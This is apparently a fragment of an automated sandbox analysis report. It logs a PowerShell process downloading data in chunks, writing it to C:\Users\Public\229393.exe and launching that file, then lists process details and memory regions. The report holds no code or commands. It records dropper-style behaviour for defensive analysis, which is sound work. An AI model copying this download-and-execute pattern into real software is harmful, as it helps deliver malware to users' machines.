|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 27588 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 27588 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 24944 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4356 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 21780 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 21780 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 20588 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5808 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 5808 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 5808 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 23232 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 23232 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 23232 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 29040 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 29040 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 29040 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 60984 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 60984 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 60984 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8712 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8712 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 8712 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8712 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8712 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 6068 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 26136 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 26136 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 24944 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4356 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 27588 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 27588 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 24944 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 24684 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 24684 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 23492 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 30492 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 30492 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 29300 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7260 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 7260 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 7260 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 11616 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 11616 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 11616 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 33396 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 33396 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 33396 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 15972 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 15972 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 13328 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 31944 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 31944 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 29300 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 14520 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 14520 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 11876 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 49368 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 49368 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 48176 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4356 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8516 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8516 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 8516 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3472 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 3472 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 884 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 884 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 26136 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 26136 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 22300 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5808 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 5808 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 5808 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5612 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 5612 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 5612 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 14324 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 14324 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 14324 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 64344 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8516 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8516 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 8516 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4356 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8516 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8516 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 8516 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5808 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 5808 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 5808 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 27588 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 27588 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 27588 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7064 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 7064 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 7064 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8516 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8516 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 8516 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 12872 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 12872 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 12872 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7260 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 7260 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 6588 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8712 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8712 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 8712 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3472 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 3472 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 884 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 884 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 64604 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8516 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8516 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 8516 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7260 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 7260 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 7260 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65340 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65340 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65340 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7260 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 7260 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 7260 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8516 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8516 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 8516 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3472 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 3472 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 18308 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 18308 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 17684 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5808 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 5808 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 5808 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 33200 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 33200 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 33200 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7064 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 7064 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 7064 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8516 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8516 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 8516 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7260 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 7260 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 7260 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 13068 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 13068 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 13068 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5808 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 5808 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 64864 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7064 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 7064 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 7064 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7064 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 7064 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 7064 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8516 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8516 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 8516 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4356 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 13068 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 13068 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 10424 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 64604 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8516 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8516 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 8516 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4160 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4160 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4160 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 65536 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 38519, size_out = 1256 |
|
1 | |
| Inet | Read Response | size = 38519, size_out = 1256 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 37263, size_out = 33396 |
|
1 | |
| Inet | Read Response | size = 37263, size_out = 33396 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 30556 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 3867, size_out = 3867 |
|
1 | |
| Inet | Read Response | size = 3867, size_out = 3867 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 3867 |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Get Info | filename = C:\Users\Public\229393.exe, type = file_attributes |
|
1 |
Thread 0x8fc
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Process | Create | process_name = C:\Users\Public\229393.exe, show_window = SW_SHOWNORMAL |
|
1 |
Process #4: 229393.exe
314
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\public\229393.exe |
| Command Line | "C:\Users\Public\229393.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:33, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8f8 |
| Parent PID | 0xb60 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
3A4
0x
648
0x
950
0x
958
0x
95C
0x
954
0x
94C
0x
948
0x
944
0x
7C0
0x
940
0x
938
0x
92C
0x
928
0x
614
0x
7E8
0x
8DC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| oleaccrc.dll | 0x001b0000 | 0x001b0fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0038ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00390000 | 0x003f6fff | Memory Mapped File | Readable |
|
|
|
- |
| 229393.exe | 0x00400000 | 0x006cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000006d0000 | 0x006d0000 | 0x0070ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x0070dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000730000 | 0x00730000 | 0x0073ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x008c7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x00a50fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000a60000 | 0x00a60000 | 0x01e5ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001e60000 | 0x01e60000 | 0x01e9dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001ec0000 | 0x01ec0000 | 0x01ecffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001ed0000 | 0x01ed0000 | 0x01faefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001fb0000 | 0x01fb0000 | 0x01feffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001fb0000 | 0x01fb0000 | 0x01fedfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001ff0000 | 0x01ff0000 | 0x01ffffff | Private Memory | Readable, Writable |
|
|
|
- |
